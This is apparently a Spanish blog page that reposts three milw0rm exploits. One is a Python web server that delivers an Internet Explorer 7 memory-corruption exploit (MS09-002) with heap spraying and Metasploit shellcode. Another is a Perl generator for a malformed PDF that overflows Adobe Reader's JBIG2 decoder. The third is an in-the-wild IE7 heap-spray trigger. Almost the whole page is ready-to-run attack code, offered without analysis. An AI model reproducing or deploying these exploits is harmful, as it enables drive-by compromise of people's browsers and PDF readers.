Publicado por zerialkiller en exploits con 0 comentarios
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
payload += '\x0a\x02\xb1\x0e';
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
function spray_heap()
{
var payload = unescape("<PAYLOAD>");
var ret = 0x0c0c0c0c;
var heap_chunk_size = 0x40000;
var nopsled_size = heap_chunk_size - (payload.length * 2)
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < nopsled_size)
nopsled += nopsled;
heap_chunks = new Array();
heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
for (var i = 0 ; i < heap_chunks_num ; i++)
heap_chunks[i] = nopsled + payload;
}
function trigger_bug()
{
var obj = document.createElement("table");
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;
CollectGarbage();
var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");
obj_cp.click;
}
if (navigator.userAgent.indexOf("MSIE 7") != -1) {
spray_heap();
trigger_bug()
} else
window.location = "about:blank"
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = '<html><body><script>' + exploit + '</script></body></html>'
return exploit
def convert_to_utf16(self, payload):
# From Beta v2.0 by Berend-Jan Wever
# http://www.milw0rm.com/exploits/656
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i+j]) & 0xff) << (j*8)
enc_payload += '%%u%04x' % num
return enc_payload
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0],
self.wfile.write(self.get_exploit())
print 'done'
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port]' % sys.argv[0]
sys.exit(1)
port = None
try:
port = int(sys.argv[1])
if port < 1 or port > 65535:
raise ValueError
except ValueError:
print '[*] ERROR: invalid port number ...'
sys.exit(-1)
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
except socket.error:
print '[*] ERROR: a socket error has occurred ...'
sys.exit(-1)
try:
serv.serve_forever()
except KeyboardInterrupt:
print '[-] Exiting ...'
if __name__ == '__main__':
main()
# milw0rm.com [2009-03-04]
Publicado por zerialkiller en exploits con 0 comentarios
Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day && MS Internet Explorer 7 Memory Corruption PoC (MS09-002)
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
}
# milw0rm.com [2009-02-23]
----------------------------------------------------------------------------------------------
MS Internet Explorer 7 Memory Corruption PoC (MS09-002)
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-18]
Categorias
Los Escritores
En el Archivo
Amigos
Lo ultimo en el blog